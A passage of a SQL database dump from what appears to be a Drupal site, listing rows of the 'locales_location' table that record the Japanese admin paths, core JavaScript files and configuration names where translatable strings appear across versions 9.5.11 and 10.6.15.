(3163, 2919, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3164, 2920, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3165, 2921, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3166, 2922, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3167, 2923, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3168, 2924, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3169, 2925, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3170, 2926, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3171, 2927, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3172, 2928, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3173, 2929, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3174, 2930, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3175, 2931, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3176, 2932, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3177, 2933, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3178, 2934, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3179, 2935, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3180, 2936, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3181, 2937, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3182, 2938, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3183, 2939, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3184, 2940, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3185, 2941, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3186, 2942, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3187, 2943, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3188, 2944, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3189, 2945, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3190, 2946, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3191, 2947, 'path', '/comet9/ja/admin/appearance/at_generate', '9.5.11'),
(3192, 2948, 'path', '/comet9/ja/admin/modules', '9.5.11'),
(3193, 2949, 'path', '/comet9/ja/admin/modules', '9.5.11'),
(3194, 2950, 'path', '/comet9/ja/admin/modules', '9.5.11'),
(3195, 2951, 'path', '/comet9/ja/admin/modules', '9.5.11'),
(3196, 2952, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3197, 2953, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3198, 2954, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3199, 2955, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3200, 2956, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3201, 2957, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3202, 2958, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3203, 2959, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3204, 2960, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3205, 2961, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3206, 2962, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3207, 2963, 'path', '/comet9/ja/admin/modules/uninstall', '9.5.11'),
(3208, 2964, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3209, 2965, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3210, 2966, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3211, 2967, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3212, 2968, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3213, 2969, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3214, 2970, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3215, 2971, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3216, 2972, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3217, 2973, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3218, 2974, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3219, 2975, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3220, 2976, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3221, 2977, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3222, 2978, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3223, 2979, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3224, 2980, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3225, 2981, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3226, 2982, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3227, 2983, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3228, 2984, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3229, 2985, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3230, 2986, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3231, 2987, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3232, 2988, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3233, 2989, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3234, 2990, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3235, 2991, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3236, 2992, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3237, 2993, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3238, 2994, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3239, 2995, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3240, 2996, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3241, 2997, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3242, 2998, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3243, 2999, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3244, 3000, 'path', '/comet9/ja/admin/modules/uninstall', '10.6.15'),
(3245, 3001, 'javascript', 'core/misc/announce.js', '10.6.15'),
(3246, 3002, 'javascript', 'core/misc/ajax.js', '10.6.15'),
(3247, 3003, 'javascript', 'core/misc/ajax.js', '10.6.15'),
(3248, 3004, 'javascript', 'core/modules/system/js/system.modules.js', '10.6.15'),
(3249, 3005, 'path', '/comet9/update.php', '10.6.15'),
(3250, 3006, 'path', '/comet9/update.php?continue=1', '10.6.15'),
(3251, 3007, 'path', '/comet9/update.php?continue=1', '10.6.15'),
(3252, 3008, 'path', '/comet9/update.php/start?id=13&op=start', '10.6.15'),
(3253, 3009, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3254, 3010, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3255, 3011, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3256, 2781, 'configuration', 'captcha.settings', '10.6.15'),
(3257, 3012, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3258, 3013, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3259, 3014, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3260, 3015, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3261, 3016, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3262, 3017, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=do&_format=json', '10.6.15'),
(3263, 45, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3264, 3018, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3265, 3019, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3266, 3020, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3267, 3021, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3268, 3022, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3269, 3023, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3270, 3024, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3271, 3025, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3272, 2020, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3273, 3026, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3274, 3027, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3275, 3028, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3276, 3029, 'configuration', 'editor.editor.full_html', '10.6.15'),
(3277, 3030, 'configuration', 'views.view.block_content', '10.6.15'),
(3278, 3031, 'configuration', 'views.view.block_content', '10.6.15'),
(3279, 3032, 'configuration', 'views.view.block_content', '10.6.15'),
(3280, 1356, 'configuration', 'views.view.block_content', '10.6.15'),
(3281, 3033, 'configuration', 'views.view.block_content', '10.6.15'),
(3282, 3034, 'configuration', 'views.view.files', '10.6.15'),
(3283, 3035, 'configuration', 'views.view.content_translations', '10.6.15'),
(3284, 3036, 'configuration', 'views.view.content_translations', '10.6.15'),
(3285, 3037, 'path', '/comet9/update.php/start?id=13&op=do_nojs&op=finished', '10.6.15'),
(3286, 3038, 'path', '/comet9/update.php/results', '10.6.15'),
(3287, 3039, 'path', '/comet9/update.php/results', '10.6.15'),
(3288, 3040, 'path', '/comet9/update.php/results', '10.6.15'),
(3289, 3041, 'path', '/comet9/update.php/results', '10.6.15'),
(3290, 3042, 'path', '/comet9/update.php/results', '10.6.15'),
(3291, 3043, 'path', '/comet9/update.php/results', '10.6.15'),
(3292, 3044, 'path', '/comet9/update.php/results', '10.6.15'),
(3293, 3045, 'path', '/comet9/update.php/results', '10.6.15'),
(3294, 3046, 'path', '/comet9/ja', '10.6.15'),
(3295, 3047, 'path', '/comet9/ja', '10.6.15'),
(3296, 3048, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3297, 3049, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3298, 3050, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3299, 3051, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3300, 3052, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3301, 3053, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3302, 3054, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3303, 3055, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3304, 3056, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3305, 3057, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3306, 3058, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3307, 3059, 'javascript', 'core/themes/claro/js/tableselect.js', '10.6.15'),
(3308, 3060, 'javascript', 'core/themes/claro/js/tableselect.js', '10.6.15'),
(3309, 3053, 'javascript', 'core/themes/claro/js/tableselect.js', '10.6.15'),
(3310, 3053, 'javascript', 'core/themes/claro/js/tableselect.js', '10.6.15'),
(3311, 3061, 'javascript', 'core/themes/claro/js/tableselect.js', '10.6.15'),
(3312, 3062, 'javascript', 'core/themes/claro/js/tableselect.js', '10.6.15'),
(3313, 3063, 'javascript', 'core/misc/tabledrag.js', '10.6.15'),
(3314, 3064, 'javascript', 'core/misc/tabledrag.js', '10.6.15'),
(3315, 3063, 'javascript', 'core/themes/claro/js/tabledrag.js', '10.6.15'),
(3316, 3064, 'javascript', 'core/themes/claro/js/tabledrag.js', '10.6.15'),
(3317, 3065, 'path', '/comet9/ja/admin/reports/updates', '10.6.15'),
(3318, 3066, 'path', '/comet9/ja/admin/reports/updates', '10.6.15'),
(3319, 3067, 'javascript', 'core/misc/machine-name.js', '10.6.15'),
(3320, 3068, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3321, 3069, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3322, 3070, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3323, 3071, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3324, 3072, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3325, 3073, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3326, 3074, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3327, 3075, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3328, 3076, 'path', '/comet9/ja/admin/content', '10.6.15'),
(3329, 3077, 'path', '/comet9/ja/admin/content/node/delete?destination=/comet9/ja/admin/content&view_id=content&display_id=page_1', '10.6.15'),
(3330, 3078, 'path', '/comet9/ja/admin/content/node/delete?destination=/comet9/ja/admin/content&view_id=content&display_id=page_1', '10.6.15'),
(3331, 3079, 'path', '/comet9/ja/node/add/activities', '10.6.15'),
(3332, 896, 'javascript', 'core/modules/ckeditor5/js/build/drupalImage.js', '10.6.15'),
(3333, 3080, 'javascript', 'core/modules/media/js/media_embed_ckeditor.theme.js', '10.6.15'),
(3334, 3080, 'javascript', 'core/themes/claro/js/classy/media_embed_ckeditor.theme.js', '10.6.15'),
(3335, 3080, 'javascript', 'core/modules/ckeditor5/js/build/drupalMedia.js', '10.6.15'),
(3336, 491, 'javascript', 'core/modules/ckeditor5/js/build/drupalMedia.js', '10.6.15'),
(3337, 3081, 'path', '/comet9/ja/node/add/activities', '10.6.15'),
(3338, 3082, 'path', '/comet9/ja/node/add/activities', '10.6.15'),
(3339, 3083, 'path', '/comet9/ja/node/add/activities', '10.6.15'),
(3340, 3084, 'path', '/comet9/', '10.6.15'),
(3341, 3085, 'path', '/comet9/', '10.6.15'),
(3342, 3086, 'path', '/comet9/', '10.6.15'),
(3343, 3087, 'path', '/comet9/', '10.6.15'),
(3344, 3088, 'path', '/comet9/', '10.6.15'),
(3345, 3089, 'path', '/comet9/', '10.6.15'),
(3346, 3090, 'path', '/comet9/', '10.6.15'),
(3347, 3091, 'path', '/comet9/', '10.6.15'),
(3348, 3092, 'path', '/comet9/', '10.6.15'),
(3349, 3093, 'path', '/comet9/', '10.6.15'),
(3350, 3094, 'path', '/comet9/', '10.6.15'),
(3351, 3095, 'path', '/comet9/', '10.6.15'),
(3352, 3096, 'path', '/comet9/', '10.6.15'),
(3353, 3097, 'path', '/comet9/', '10.6.15'),
(3354, 3098, 'path', '/comet9/', '10.6.15'),
(3355, 3099, 'path', '/comet9/', '10.6.15'),
(3356, 3100, 'path', '/comet9/', '10.6.15'),
(3357, 3101, 'path', '/comet9/', '10.6.15'),
(3358, 3102, 'path', '/comet9/', '10.6.15'),
(3359, 3103, 'path', '/comet9/', '10.6.15'),
(3360, 3104, 'path', '/comet9/', '10.6.15'),
(3361, 3105, 'path', '/comet9/', '10.6.15'),
(3362, 3106, 'path', '/comet9/', '10.6.15'),
(3363, 3107, 'path', '/comet9/', '10.6.15'),
(3364, 3108, 'path', '/comet9/', '10.6.15'),
(3365, 3109, 'path', '/comet9/', '10.6.15'),
(3366, 3110, 'path', '/comet9/', '10.6.15'),
(3367, 3111, 'path', '/comet9/', '10.6.15'),
(3368, 3112, 'path', '/comet9/', '10.6.15'),
(3369, 3113, 'path', '/comet9/', '10.6.15'),
(3370, 3114, 'path', '/comet9/', '10.6.15'),
(3371, 3115, 'path', '/comet9/', '10.6.15'),
(3372, 3116, 'path', '/comet9/', '10.6.15'),
(3373, 3117, 'path', '/comet9/', '10.6.15'),
(3374, 3118, 'path', '/comet9/', '10.6.15'),
(3375, 3119, 'path', '/comet9/', '10.6.15'),
(3376, 3120, 'path', '/comet9/', '10.6.15'),
(3377, 3121, 'path', '/comet9/', '10.6.15'),
(3378, 3122, 'path', '/comet9/', '10.6.15'),
(3379, 3123, 'path', '/comet9/', '10.6.15'),
(3380, 3124, 'path', '/comet9/', '10.6.15'),
(3381, 3125, 'path', '/comet9/', '10.6.15'),
(3382, 3126, 'path', '/comet9/', '10.6.15'),
(3383, 3127, 'path', '/comet9/', '10.6.15'),
(3384, 3128, 'path', '/comet9/', '10.6.15'),
(3385, 3129, 'path', '/comet9/', '10.6.15'),
(3386, 3130, 'path', '/comet9/', '10.6.15'),
(3387, 3131, 'path', '/comet9/', '10.6.15'),
(3388, 3132, 'path', '/comet9/', '10.6.15'),
(3389, 3133, 'path', '/comet9/', '10.6.15'),
(3390, 3134, 'path', '/comet9/', '10.6.15'),
(3391, 3135, 'path', '/comet9/', '10.6.15'),
(3392, 3136, 'path', '/comet9/', '10.6.15'),
(3393, 3137, 'path', '/comet9/', '10.6.15'),
(3394, 3138, 'path', '/comet9/', '10.6.15'),
(3395, 3139, 'path', '/comet9/', '10.6.15'),
(3396, 3140, 'path', '/comet9/', '10.6.15'),
(3397, 3141, 'path', '/comet9/', '10.6.15'),
(3398, 3142, 'path', '/comet9/', '10.6.15'),
(3399, 3143, 'path', '/comet9/', '10.6.15'),
(3400, 3144, 'path', '/comet9/', '10.6.15'),
(3401, 3145, 'path', '/comet9/', '10.6.15'),
(3402, 3146, 'path', '/comet9/', '10.6.15'),
(3403, 3147, 'path', '/comet9/', '10.6.15'),
(3404, 3148, 'path', '/comet9/', '10.6.15'),
(3405, 3149, 'path', '/comet9/', '10.6.15'),
(3406, 3150, 'path', '/comet9/', '10.6.15'),
(3407, 3151, 'path', '/comet9/', '10.6.15'),
(3408, 3152, 'path', '/comet9/', '10.6.15'),
(3409, 3153, 'path', '/comet9/', '10.6.15'),
(3410, 3154, 'path', '/comet9/', '10.6.15'),
(3411, 3155, 'path', '/comet9/', '10.6.15'),
(3412, 3156, 'path', '/comet9/', '10.6.15'),
(3413, 3157, 'path', '/comet9/', '10.6.15'),
(3414, 3158, 'path', '/comet9/', '10.6.15'),
(3415, 3159, 'path', '/comet9/', '10.6.15'),
(3416, 3160, 'path', '/comet9/', '10.6.15'),
(3417, 3161, 'path', '/comet9/', '10.6.15'),
(3418, 3162, 'path', '/comet9/', '10.6.15'),
(3419, 3163, 'path', '/comet9/', '10.6.15'),
(3420, 3164, 'path', '/comet9/', '10.6.15'),
(3421, 3165, 'path', '/comet9/', '10.6.15'),
(3422, 3166, 'path', '/comet9/', '10.6.15'),
(3423, 3167, 'path', '/comet9/', '10.6.15'),
(3424, 3168, 'path', '/comet9/', '10.6.15'),
(3425, 3169, 'path', '/comet9/', '10.6.15'),
(3426, 3170, 'path', '/comet9/', '10.6.15'),
(3427, 3171, 'path', '/comet9/', '10.6.15'),
(3428, 3172, 'path', '/comet9/', '10.6.15'),
(3429, 3173, 'path', '/comet9/', '10.6.15'),
(3430, 3174, 'path', '/comet9/', '10.6.15'),
(3431, 3175, 'path', '/comet9/', '10.6.15'),
(3432, 3176, 'path', '/comet9/', '10.6.15'),
(3433, 3177, 'path', '/comet9/', '10.6.15'),
(3434, 3178, 'path', '/comet9/', '10.6.15'),
(3435, 3179, 'path', '/comet9/', '10.6.15'),
(3436, 3180, 'path', '/comet9/', '10.6.15'),
(3437, 3181, 'path', '/comet9/', '10.6.15'),
(3438, 3182, 'path', '/comet9/', '10.6.15'),
(3439, 3183, 'path', '/comet9/', '10.6.15'),
(3440, 3184, 'path', '/comet9/', '10.6.15'),
(3441, 3185, 'path', '/comet9/', '10.6.15'),
(3442, 3186, 'path', '/comet9/', '10.6.15'),
(3443, 3187, 'path', '/comet9/', '10.6.15'),
(3444, 3188, 'path', '/comet9/', '10.6.15'),
(3445, 3189, 'path', '/comet9/', '10.6.15'),
(3446, 3190, 'path', '/comet9/', '10.6.15'),
(3447, 3191, 'path', '/comet9/', '10.6.15'),
(3448, 3192, 'path', '/comet9/', '10.6.15'),
(3449, 3193, 'path', '/comet9/', '10.6.15'),
(3450, 3194, 'path', '/comet9/', '10.6.15'),
(3451, 3195, 'path', '/comet9/', '10.6.15'),
(3452, 3196, 'path', '/comet9/', '10.6.15'),
(3453, 3197, 'path', '/comet9/', '10.6.15'),
(3454, 3198, 'path', '/comet9/', '10.6.15'),
(3455, 3199, 'path', '/comet9/', '10.6.15'),
(3456, 3200, 'path', '/comet9/', '10.6.15'),
(3457, 3201, 'path', '/comet9/', '10.6.15'),
(3458, 3202, 'path', '/comet9/', '10.6.15'),
(3459, 3203, 'path', '/comet9/', '10.6.15'),
(3460, 3204, 'path', '/comet9/', '10.6.15'),
(3461, 3205, 'path', '/comet9/', '10.6.15'),
(3462, 3206, 'path', '/comet9/', '10.6.15'),
(3463, 3207, 'path', '/comet9/', '10.6.15'),
(3464, 3208, 'path', '/comet9/', '10.6.15'),
(3465, 3209, 'path', '/comet9/', '10.6.15'),
(3466, 3210, 'path', '/comet9/', '10.6.15'),
(3467, 3211, 'path', '/comet9/', '10.6.15'),
(3468, 3212, 'path', '/comet9/', '10.6.15'),
(3469, 3213, 'path', '/comet9/', '10.6.15'),
(3470, 3214, 'path', '/comet9/', '10.6.15'),
(3471, 3215, 'path', '/comet9/', '10.6.15'),
(3472, 3216, 'path', '/comet9/', '10.6.15'),
(3473, 3217, 'path', '/comet9/', '10.6.15'),
(3474, 3218, 'path', '/comet9/', '10.6.15'),
(3475, 3219, 'path', '/comet9/', '10.6.15'),
(3476, 3220, 'path', '/comet9/', '10.6.15');
INSERT INTO `locales_location` (`lid`, `sid`, `type`, `name`, `version`) VALUES
(3477, 3221, 'path', '/comet9/', '10.6.15'),
(3478, 3222, 'path', '/comet9/', '10.6.15'),
(3479, 3223, 'path', '/comet9/', '10.6.15'),
(3480, 3224, 'path', '/comet9/', '10.6.15'),
(3481, 3225, 'path', '/comet9/', '10.6.15'),
(3482, 3226, 'path', '/comet9/', '10.6.15'),
(3483, 3227, 'path', '/comet9/', '10.6.15'),
(3484, 3228, 'path', '/comet9/', '10.6.15'),
(3485, 3229, 'path', '/comet9/', '10.6.15'),
(3486, 3230, 'path', '/comet9/', '10.6.15'),
(3487, 3231, 'path', '/comet9/', '10.6.15'),
(3488, 3232, 'path', '/comet9/', '10.6.15'),
(3489, 3233, 'path', '/comet9/', '10.6.15'),
(3490, 3234, 'path', '/comet9/', '10.6.15'),
(3491, 3235, 'path', '/comet9/', '10.6.15'),
(3492, 3236, 'path', '/comet9/', '10.6.15'),
(3493, 3237, 'path', '/comet9/', '10.6.15'),
(3494, 3238, 'path', '/comet9/', '10.6.15'),
(3495, 3239, 'path', '/comet9/', '10.6.15'),
(3496, 3240, 'path', '/comet9/', '10.6.15'),
(3497, 3241, 'path', '/comet9/', '10.6.15'),
(3498, 3242, 'path', '/comet9/', '10.6.15'),
(3499, 3243, 'path', '/comet9/', '10.6.15'),
(3500, 3244, 'path', '/comet9/', '10.6.15'),
(3501, 3245, 'path', '/comet9/', '10.6.15'),
(3502, 3246, 'path', '/comet9/', '10.6.15'),
(3503, 3247, 'path', '/comet9/', '10.6.15'),
(3504, 3248, 'path', '/comet9/', '10.6.15'),
(3505, 3249, 'path', '/comet9/', '10.6.15'),
(3506, 3250, 'path', '/comet9/', '10.6.15'),
(3507, 3251, 'path', '/comet9/', '10.6.15'),
(3508, 3252, 'path', '/comet9/', '10.6.15'),
(3509, 3253, 'path', '/comet9/', '10.6.15'),
(3510, 3254, 'path', '/comet9/', '10.6.15'),
(3511, 3255, 'path', '/comet9/', '10.6.15'),
(3512, 3256, 'path', '/comet9/', '10.6.15'),
(3513, 3257, 'path', '/comet9/', '10.6.15'),
(3514, 3258, 'path', '/comet9/', '10.6.15'),
(3515, 3259, 'path', '/comet9/', '10.6.15'),
(3516, 3260, 'path', '/comet9/', '10.6.15'),
(3517, 3261, 'path', '/comet9/', '10.6.15'),
(3518, 3262, 'path', '/comet9/', '10.6.15'),
(3519, 3263, 'path', '/comet9/', '10.6.15'),
(3520, 3264, 'path', '/comet9/', '10.6.15'),
(3521, 3265, 'path', '/comet9/', '10.6.15'),
(3522, 3266, 'path', '/comet9/', '10.6.15'),
(3523, 3267, 'path', '/comet9/', '10.6.15'),
(3524, 3268, 'path', '/comet9/', '10.6.15'),
(3525, 3269, 'path', '/comet9/', '10.6.15'),
(3526, 3270, 'path', '/comet9/', '10.6.15'),
(3527, 3271, 'path', '/comet9/', '10.6.15'),
(3528, 3272, 'path', '/comet9/', '10.6.15'),
(3529, 3273, 'path', '/comet9/', '10.6.15'),
(3530, 3274, 'path', '/comet9/', '10.6.15'),
(3531, 3275, 'path', '/comet9/', '10.6.15'),
(3532, 3276, 'path', '/comet9/', '10.6.15'),
(3533, 3277, 'path', '/comet9/', '10.6.15'),
(3534, 3278, 'path', '/comet9/', '10.6.15'),
(3535, 3279, 'path', '/comet9/', '10.6.15'),
(3536, 3280, 'path', '/comet9/', '10.6.15'),
(3537, 3281, 'path', '/comet9/', '10.6.15'),
(3538, 3282, 'path', '/comet9/', '10.6.15'),
(3539, 3283, 'path', '/comet9/', '10.6.15'),
(3540, 3284, 'path', '/comet9/', '10.6.15'),
(3541, 3285, 'path', '/comet9/', '10.6.15'),
(3542, 3286, 'path', '/comet9/', '10.6.15'),
(3543, 3287, 'path', '/comet9/', '10.6.15'),
(3544, 3288, 'path', '/comet9/', '10.6.15'),
(3545, 3289, 'path', '/comet9/', '10.6.15'),
(3546, 3290, 'path', '/comet9/', '10.6.15'),
(3547, 3291, 'path', '/comet9/', '10.6.15'),
(3548, 3292, 'path', '/comet9/', '10.6.15'),
(3549, 3293, 'path', '/comet9/', '10.6.15'),
(3550, 3294, 'path', '/comet9/', '10.6.15'),
(3551, 3295, 'path', '/comet9/', '10.6.15'),
(3552, 3296, 'path', '/comet9/', '10.6.15'),
(3553, 3297, 'path', '/comet9/', '10.6.15'),
(3554, 3298, 'path', '/comet9/', '10.6.15'),
(3555, 3299, 'path', '/comet9/', '10.6.15'),
(3556, 3300, 'path', '/comet9/', '10.6.15'),
(3557, 3301, 'path', '/comet9/', '10.6.15'),
(3558, 3302, 'path', '/comet9/', '10.6.15'),
(3559, 3303, 'path', '/comet9/', '10.6.15'),
(3560, 3304, 'path', '/comet9/', '10.6.15'),
(3561, 3305, 'path', '/comet9/', '10.6.15'),
(3562, 3306, 'path', '/comet9/', '10.6.15'),
(3563, 3307, 'path', '/comet9/', '10.6.15'),
(3564, 3308, 'path', '/comet9/', '10.6.15'),
(3565, 3309, 'path', '/comet9/', '10.6.15'),
(3566, 3310, 'path', '/comet9/', '10.6.15'),
(3567, 3311, 'path', '/comet9/', '10.6.15'),
(3568, 3312, 'path', '/comet9/ja/user/2?check_logged_in=1', '10.6.15'),
(3569, 3313, 'path', '/comet9/', '10.6.15'),
(3570, 3314, 'path', '/comet9/ja/user/2?check_logged_in=1', '10.6.15'),
(3571, 3315, 'path', '/comet9/', '10.6.15'),
(3572, 3316, 'path', '/comet9/', '10.6.15'),
(3573, 3317, 'path', '/comet9/', '10.6.15'),
(3574, 3318, 'path', '/comet9/', '10.6.15'),
(3575, 3319, 'path', '/comet9/', '10.6.15'),
(3576, 3320, 'path', '/comet9/', '10.6.15'),
(3577, 3321, 'path', '/comet9/', '10.6.15'),
(3578, 3322, 'path', '/comet9/', '10.6.15'),
(3579, 3323, 'path', '/comet9/', '10.6.15'),
(3580, 3324, 'path', '/comet9/', '10.6.15'),
(3581, 3325, 'path', '/comet9/', '10.6.15'),
(3582, 3326, 'path', '/comet9/', '10.6.15'),
(3583, 3327, 'path', '/comet9/', '10.6.15'),
(3584, 3328, 'path', '/comet9/', '10.6.15'),
(3585, 3329, 'path', '/comet9/', '10.6.15'),
(3586, 3330, 'path', '/comet9/', '10.6.15'),
(3587, 3331, 'path', '/comet9/', '10.6.15'),
(3588, 3332, 'path', '/comet9/', '10.6.15'),
(3589, 3333, 'path', '/comet9/', '10.6.15'),
(3590, 3334, 'path', '/comet9/', '10.6.15'),
(3591, 3335, 'path', '/comet9/', '10.6.15'),
(3592, 3336, 'path', '/comet9/', '10.6.15'),
(3593, 3337, 'path', '/comet9/', '10.6.15'),
(3594, 3338, 'path', '/comet9/', '10.6.15'),
(3595, 3339, 'path', '/comet9/', '10.6.15'),
(3596, 3340, 'path', '/comet9/', '10.6.15'),
(3597, 3341, 'path', '/comet9/', '10.6.15'),
(3598, 3342, 'path', '/comet9/', '10.6.15'),
(3599, 3343, 'path', '/comet9/', '10.6.15'),
(3600, 3344, 'path', '/comet9/', '10.6.15'),
(3601, 3345, 'path', '/comet9/', '10.6.15'),
(3602, 3346, 'path', '/comet9/', '10.6.15'),
(3603, 3347, 'path', '/comet9/', '10.6.15'),
(3604, 3348, 'path', '/comet9/', '10.6.15'),
(3605, 3349, 'path', '/comet9/', '10.6.15'),
(3606, 3350, 'path', '/comet9/', '10.6.15'),
(3607, 3351, 'path', '/comet9/', '10.6.15'),
(3608, 3352, 'path', '/comet9/', '10.6.15'),
(3609, 3353, 'path', '/comet9/', '10.6.15'),
(3610, 3354, 'path', '/comet9/', '10.6.15'),
(3611, 3355, 'path', '/comet9/', '10.6.15'),
(3612, 3356, 'path', '/comet9/ja/admin/appearance', '10.6.15'),
(3613, 3357, 'path', '/comet9/', '10.6.15'),
(3614, 3358, 'path', '/comet9/', '10.6.15'),
(3615, 3359, 'path', '/comet9/', '10.6.15'),
(3616, 3360, 'path', '/comet9/', '10.6.15'),
(3617, 3361, 'path', '/comet9/', '10.6.15'),
(3618, 3362, 'path', '/comet9/', '10.6.15'),
(3619, 3363, 'path', '/comet9/', '10.6.15'),
